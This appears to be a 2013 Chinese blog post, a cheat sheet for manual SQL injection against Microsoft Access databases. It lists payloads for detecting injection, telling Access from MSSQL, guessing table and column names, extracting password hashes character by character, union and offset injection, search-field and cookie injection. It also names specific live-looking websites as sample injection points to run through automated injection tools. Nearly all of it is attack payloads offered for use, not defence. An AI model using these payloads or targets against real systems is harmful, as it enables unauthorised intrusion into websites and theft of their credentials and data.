2013年2月12日星期二
access手工注入基础整理
一.判断注入
数字型查询 and 1=1 and 1=2
字符型查询 'and '1'='1 'and'1'='2
二.数据库类型的判断
1.普通报错
JET引擎连接数据库 access
ODBC引擎连接数据库 mssql
2.手工猜解
;--
mssql数据库里 ;为语句间分隔符 --为解释符
所以mssql返回正确,access返回错误
3.access和mssql差异查询
and exists (select * from sysobjects) mssql返回无法读取
and exists (select * from mysysobjects) access返回无权限
三.access数据库手工注入(通用)
1.猜表
and exists (select * from 表名)
2.猜列
and (select 列名 from 表名)
3.猜列个数
and (select 列名 from 表名)=X 管理员个数
3.猜列长度
and (select top 1 len(列名) from 表名)=X 一般密码都md5加密16 32 40 位 用户名一般5位admin
4.猜字段内容
and (select top 1 asc(mid(列名,x,1)) from 表名)=xx 中文asc负数abs()函数
四.access数据库联合查询注入
1.猜列个数
排序法 order by X
覆盖法 and 1=2 union select 1,2,3,....x from 表名
2.猜字段内容
and 1=2 union select 1,2,3,4,..x from 表名
五. access偏移注入
1.从后往前偏移
-x 第一次 *前移自减直到显示出数据 x即admin中的列
-x-x 第二次 from (admin as a inner join admin as b on a.id=b.id) 无数据 再 在*前添加 *-1或a.id,b.id, 为了打得更乱
-x-x-x 第三次 from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id) 无数据再添c.id
-x-x-x-x 第四次 from(((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id) inner join admin as
d on a.id=d.id) 无数据再添d.id
2.从前往后偏移
and 1=2 union select *from( from (admin as a inner join admin as b on a.id=b.id )
and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select * from admin) as c on c.id=a.id
六.搜索型注入
1.判断存在
%' and 1=1 and '%'='
%' and 1=2 and '%'='
a%' and 1=1-- 正常
a%' and 1=2-- 错误
2.get搜索型手工注入
猜表列
1%'and(select count(列名)from 表名)>0 and '%'='
猜列名长度
1%'and(select top 1 len(列名)from 表名) and '%'='
猜字段
1%'and(select top 1 asc(mid(列名,N,1))from 表名)>X and '%'='
3.get搜索型工具注入
注入点
http://www.sctone.com.cn/sctone/News_search.asp?key=1&otype=title& amp;Submit=Search
两种修改注入点关键字放最后
http://www.sctone.com.cn/sctone/News_search.asp?otype=title&Submit=Search&key=1
http://www.sctone.com.cn/sctone/News_search.asp?key=1
放进工具跑
nbsi hdsi 穿山甲
4.post搜索型工具注入
wsockexpert抓包 把关键字放到url的后面
http://www.cnaec.com.cn/Work/refer/Search/2.asp
http://www.cnaec.com.cn/Work/refer/Search/2.asp?KeyWord=1
放到工具跑
nbsi hdsi pangolin
七.cookies注入
1.cookies的注入语句:
javascript:alert(document.cookie="id="+escape("ID值 and 注入攻击代码"));
2.cookies工具注入
利用cookies注入中转工具修改url
本地搭建服务器
没有评论:
发表评论